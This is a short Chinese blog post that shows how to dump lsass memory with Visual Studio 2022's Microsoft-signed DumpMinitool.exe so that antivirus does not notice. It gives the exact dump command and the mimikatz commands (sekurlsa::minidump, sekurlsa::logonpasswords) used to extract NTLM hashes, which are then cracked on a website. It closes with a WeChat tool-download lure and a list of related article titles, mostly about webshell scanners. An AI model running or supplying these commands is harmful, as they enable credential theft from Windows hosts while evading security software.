最近看到mrd0x分享了一个程序通过此程序执行命令获取lsass转储文件,此文件是vs2022里的DumpMinitool.exe。此程序路径为:

C:\ProgramFiles\MicrosoftVisualStudio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions

接下来测试一下效果,先看一下程序信息

查看数字签名发现是微软,到这已经可以预见测试效果了,接下来开始正式测试。

使用火绒对程序扫描:

使用程序执行命令

DumpMinitool.exe --file lsass.dmp --processId 512 --dumpType Full

整个过程杀软没有任何动静。

dump完成后拿到本地使用mimikatz获取到ntlm,首先把lsass.dmp文件放到程序目录下,然后执行以下命令

mimikatz.exe
sekurlsa::minidump "lsass.dmp"
sekurlsa::logonpasswords

执行完成后,拿到账户的ntlm值,使用解密网站解密即可获取到密码。

文章中使用的相关工具关注微信公众号并后台回复 密码" 两字 即可获取

绕过查杀工具实现lsass转储相关推荐

  1. [应急响应]7款WebShell扫描检测查杀工具

    1.D盾 防火墙 阿D出品,免费,GUI,WebShell扫描检测查杀 功能特性简介 支持系统:win2003/win2008/win2012/win2016 PHP支持:FastCGI/ISAPI ...

  2. 网站后门查杀工具推荐

    作为一个小站长,对于网站的后门代码肯定是深恶痛绝的,尤其是在建站初期,因为一些原因而使用非正版主题,很容易出现这个问题,而往往一些不良的代码贩子,总喜欢给自己贩卖的主题等源代码贴上完美破解.无后门等标 ...

  3. 恶意软件查杀工具分享

    此分享为恶意软件查杀工具,百度云盘下载云盘下载链接 提取码:py07 此链接永久有效

  4. 1.41亿部手机装有间谍软件! 360推国内首个CIQ查杀工具

    近日,一款名为Carrier IQ(简称CIQ)的内核级间谍软件被曝光.该软件会暗中收集用户隐私信息,甚至每按下一个键盘都会被秘密地记录在案.中国不少智能手机用户,尤其是水货手机用户人心惶惶.对此,3 ...

  5. 常见的 Webshell 查杀工具

    前言 当网站服务器被入侵时,我们需要一款Webshell检测工具,来帮助我们发现webshell,进一步排查系统可能存在的安全漏洞. 本文推荐了10款 WebShll 检测工具,用于网站入侵排查.当然 ...

  6. 应急响应之Webshell查杀工具

    当网站服务器被入侵时,我们需要一款Webshell检测工具,来帮助我们发现webshell,进一步排查系统可能存在的安全漏洞. 本文推荐了10款Webshll检测工具,用于网站入侵排查.当然,目前市场 ...

  7. 突发,千万别重启!incaseformat蠕虫病毒来袭,警惕文件遭全盘删除(附:免费查杀工具)

    2021年1月13日,国内某著名安全团队监测到一种名为incaseformat的蠕虫病毒在国内爆发, 该蠕虫病毒执行后会自复制到系统盘Windows目录下,并创建注册表自启动,一旦用户重启主机,使得病 ...

  8. 应急响应入侵排查之第三篇常见的 Webshell 在线查杀工具

    文章目录 前言 工具一:D盾_Web查杀 工具二:百度 WEBDIR+ 工具三:河马 工具四:bot_net 摘抄 前言 当网站服务器被入侵时,我们需要一款Webshell检测工具,来帮助我们发现we ...

  9. linux系统 网站木马后门Webshell查杀工具源码

    后门这东西好让人头疼,第一文件太多了,不容易找,第二,难找,需要特征匹配啊.搞了一个python版查杀php webshell后门工具,大家可以增加后门的特征码,然后甩到后台给他查杀就可以了.适合Li ...

  10. webshell查杀工具

    D盾_Web查杀:http://www.d99net.net/index.asp 河马webshell查杀:http://www.shellpub.com 深信服Webshell网站后门检测工具:ht ...

最新文章

  1. URLEncoder和URLDecoder中特殊字符的处理方案 URL传值问题
  2. 真假应用傻傻分不清,HideIcon病毒玩起“隐身计”
  3. 2020\Simulation_1\4.数字9
  4. Abp VNext 集成sharding-core 分表分库
  5. element ui 表单验证为正整数
  6. 值对于 int32 太大或太小_怎样将视频文件变小却对画质没有太大影响呢?
  7. 计算机技术博客博客知乎,我的技术博客的选择:CSDN、博客园、简书、知乎专栏仍是Github Page?...
  8. 面试:一文搞懂 final 关键字的作用
  9. 扩展中断控制器8259实验_「正点原子FPGA连载」第十三章双核AMP实验
  10. 《Linux命令行与shell脚本编程大全》第十八章 图形化桌面环境中的脚本编程
  11. DAY16-T1342面试题 05.08 -2022-01-31-非自己作答
  12. python爬取数据教程_python爬虫爬取网页数据并解析数据
  13. 如何更改python界面颜色_pycharm修改界面主题颜色的方法 pycharm怎么恢复默认设置...
  14. 编译g2o提示错误 error: ‘ScalarBinaryOpTraits’ is not a class template
  15. android studio 魅族真机 flyme6 下logcat 打印自定义日志
  16. Laravel的ORM模型的find(),findOrFail(),first(),firstOrFail(),get(),list(),toArray()之间的区别是什么?
  17. 华为android9王者荣耀卡,华为mate9玩王者荣耀怎么样 mate9玩王者荣耀卡吗
  18. 在电脑上打开手机当前浏览的网页
  19. 轻松实现网页中通过链接跳转到QQ聊天界面,通过链接加QQ群,自动打开聊天对话框等等,包含电脑版和手机版的实现,示例部分Android和iOS的代码
  20. 为什么日本的网页设计风格还停留在90年代?

热门文章

  1. easyweb前端框架的资料
  2. origin 修改默认字体
  3. 计算机网络面试基础知识
  4. gohost -- go 开发的命令行hosts配置管理工具 1
  5. 广联达只有土建打不开_广联达BIM钢筋算量为什么打开工程是灰屏?工程打不开怎么办?...
  6. 手把手教你写一篇国家级大创
  7. SSS1700设计方案|SSS1700中文说明书
  8. 编译原理笔记05-语法分析自底向上
  9. office :word ppt excel 取消加载 有道翻译,有道云笔记插件
  10. 关于SQL2005安装后更改计算机名后…